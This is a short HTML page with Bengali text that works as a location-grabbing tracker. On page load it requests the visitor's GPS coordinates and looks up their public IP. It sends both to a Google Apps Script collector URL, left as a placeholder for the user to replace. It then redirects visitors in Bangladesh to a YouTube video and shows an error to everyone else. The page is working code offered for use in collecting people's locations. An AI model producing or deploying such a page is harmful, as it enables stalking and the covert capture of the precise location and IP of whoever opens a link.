
<!DOCTYPE html>
<html>
  <head>
    <title>📍 লোকেশন ট্র্যাক করা হচ্ছে...</title>
    <meta charset="UTF-8">
    <script>
      function sendLocation() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(function(position) {
            var lat = position.coords.latitude;
            var lon = position.coords.longitude;

            fetch('https://api.ipify.org?format=json')
              .then(response => response.json())
              .then(data => {
                var ip = data.ip;

                // 🔗 আপনার Web App URL এখানে বসান (Google Apps Script Web App)
                var url = "https://script.google.com/macros/s/AKfycbxYzEXAMPLE1234567890/exec" +
                          "?lat=" + lat + "&lon=" + lon + "&ip=" + ip;

                // ✅ Redirect করার আগে লোকেশন ডেটা পাঠিয়ে দিন
                fetch(url).then(() => {
                  // ✅ বাংলাদেশ হলে রিডাইরেক্ট করুন
                  fetch('https://ipapi.co/json/')
                    .then(res => res.json())
                    .then(info => {
                      if (info.country_name === "Bangladesh") {
                        window.location.href = "https://youtu.be/kgM3Plvl4S4?si=yNRGqr4w0oQgwsyn";
                      } else {
                        document.body.innerHTML = "<h2>⚠️ এই পরিষেবাটি শুধু বাংলাদেশে পাওয়া যায়</h2>";
                      }
                    });
                });
              });
          });
        } else {
          alert("📵 আপনার ডিভাইসে লোকেশন চালু নেই");
        }
      }
    </script>
  </head>
  <body onload="sendLocation()">
    <h2>📡 আপনার লোকেশন সংগ্রহ করা হচ্ছে...</h2>
  </body>
</html>
